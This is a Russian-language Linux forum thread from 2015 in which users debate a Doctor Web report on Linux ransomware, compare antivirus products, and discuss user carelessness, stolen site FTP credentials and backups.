slavyanix писал(а): это ты не дыру нашел , это ты запуск скрипта нашел.)) извини но сам он не запустится. это надо запустить прогу на компе . точнее оболочку и уже из неё выполнить скрипт. фишка тут в том что права на чтение никто не отменял, а bash больше ничего и не надо. вопрос только в том кто запустит bash команду на чтение скрипта.)) тот кто знает как это сделать не совсем чайник. такчто тут как и везде - прокладка между монитором и сиденьем самое слабое место компа.))

Не, это ты мне поясни свою уверенность. Был apturl, например, а всякие java и сейчас есть. Это про браузер. По ссылке выше - в основном про сервер, но есть и "Атака на DHCP-клиент". Для домашнего десктопа не сильно актуально, да. Про прокладку

И бита x у него нет. Это я к чему. http://forum.rosalab.ru/viewtopic.php?f ... 319#p41146 не панацея.
UPD Скачал *.tar.xz, распаковал (GUI) и install.sh имеет бит x. Правда по 2клику - то же окно. И да, ext4.

Алзим · Сообщение **Алзим** » 01 дек 2015, 18:06

Barmalei писал(а): Вычищал после Касперского я неделю назад.
На вынь у меня уже 7 лет стоит DrWeb. Копм всегда чистый при том что ребенок все время читы ищет.
Скорее тут прокладка виновата как писали выше. Я Доктора запаролил и ребенок не в состоянии дать ему на одобрение.

Касперский сразу надо ставить на только что установленную систему. Впрочем, как и все остальные антивирусы.
Касперский у меня долго стоял. Он какое-то время на Яндексе был бесплатный.
А вычищать — это значит настроено где-то неправильно.
А Вебер у многих знакомых был — решето. Я когда приходил, сразу его сносил и бесплатного Касперского ставил.

notauser · Сообщение **notauser** » 01 дек 2015, 18:18

Алзим писал(а):
notauser писал(а):"Специалисты компании «Доктор Веб» внимательно следят за развитием ситуации."
Вы забыли слово «специалисты» добавить в кавычки. Эти «специалисты» даже не смогли создать нормальный вирус ради того, чтобы пиарить свою антивируску сделанную под Линукс. Над «Доктор Вебер» наверное уже весь интернет смеётся над их бездарностью.

Это цитата с их сайта.

Barmalei · Сообщение **Barmalei** » 01 дек 2015, 18:28

Алзим писал(а):
Barmalei писал(а): Вычищал после Касперского я неделю назад.
На вынь у меня уже 7 лет стоит DrWeb. Копм всегда чистый при том что ребенок все время читы ищет.
Скорее тут прокладка виновата как писали выше. Я Доктора запаролил и ребенок не в состоянии дать ему на одобрение.
Касперский сразу надо ставить на только что установленную систему. Впрочем, как и все остальные антивирусы.
Касперский у меня долго стоял. Он какое-то время на Яндексе был бесплатный.
А вычищать — это значит настроено где-то неправильно.
А Вебер у многих знакомых был — решето. Я когда приходил, сразу его сносил и бесплатного Касперского ставил.

На вкус и цвет товарищей нет. Ни разу не приходилось чистить под Доктором.
В некоторой степени все же виноваты сами юзверы.

Алзим · Сообщение **Алзим** » 01 дек 2015, 18:44

Barmalei писал(а): В некоторой степени все же виноваты сами юзверы.

Вот на этой фразе давайте и остановимся.

Только, не в какой-то степени, а чаще всего, в самой основной степени.
У меня есть знакомый, которому никакой антивирус не поможет. Он устанавливает на комп всё, что на сайтах скажут. Похоже, он знает только одну кнопочку «ОК». И даже то, что он периодически переустанавливает Винду, это не помогает. Он продолжает упрямо соглашаться и ставить всё, что ему предлагают в сети.

Delles · Сообщение **Delles** » 01 дек 2015, 19:19

Только непонятно, слова "несанкционированный доступ к сайту" имеют какое-то значение или нет? Во-первых, если нет "несанкционированного доступа к сайту", нет и этого вируса. Во-вторых, у нас не сайты, а обычные компы.

Barmalei · Сообщение **Barmalei** » 01 дек 2015, 20:56

Delles писал(а):Только непонятно, слова "несанкционированный доступ к сайту" имеют какое-то значение или нет? Во-первых, если нет "несанкционированного доступа к сайту", нет и этого вируса. Во-вторых, у нас не сайты, а обычные компы.

Дело в том чтобы распространить вирусню, получают доступы к сайтам и туда прописывают заразы свои.

Andersen · Сообщение **Andersen** » 01 дек 2015, 21:04

Какие антивирусы?Зачем?Для дополнительных тормозов и глюков?На виндовсе держите эти программы-там иногда бывает не лишними...

Delles · Сообщение **Delles** » 01 дек 2015, 21:33

Barmalei писал(а):Дело в том чтобы распространить вирусню, получают доступы к сайтам и туда прописывают заразы свои.

Вот именно. А получать доступы не должны. Значит, админы сайтов, не озаботившиеся охраной доступа, получат шифрование данных и затем наладят охрану доступа. А то, что на персональный комп кто-то ① закинет подобный файл и ② побудит его запустить, слишком маловероятно. Впрочем, если удастся, юзер получит шифрование данных и затем озаботится организацией бэкапа (если еще не). Так что всё к лучшему.

Barmalei · Сообщение **Barmalei** » 01 дек 2015, 21:48

Delles писал(а):
Barmalei писал(а):Дело в том чтобы распространить вирусню, получают доступы к сайтам и туда прописывают заразы свои.
Вот именно. А получать доступы не должны. Значит, админы сайтов, не озаботившиеся охраной доступа, получат шифрование данных и затем наладят охрану доступа. А то, что на персональный комп кто-то ① закинет подобный файл и ② побудит его запустить, слишком маловероятно. Впрочем, если удастся, юзер получит шифрование данных и затем озаботится организацией бэкапа (если еще не). Так что всё к лучшему.

Не факт. Бывает и так. У админов трояны просто ничего не заражают, а воруют ФТП доступы и удаляются. А других потом шифруют.
Пирамида некая.

Delles · Сообщение **Delles** » 01 дек 2015, 22:07

Barmalei писал(а):воруют ФТП доступы и удаляются. А других потом шифруют

Всяко админ отвечать должен, и другие тоже бэкап иметь. Я к тому, что ситуация в общем банальна. Если б не пиар Доктора Уеба.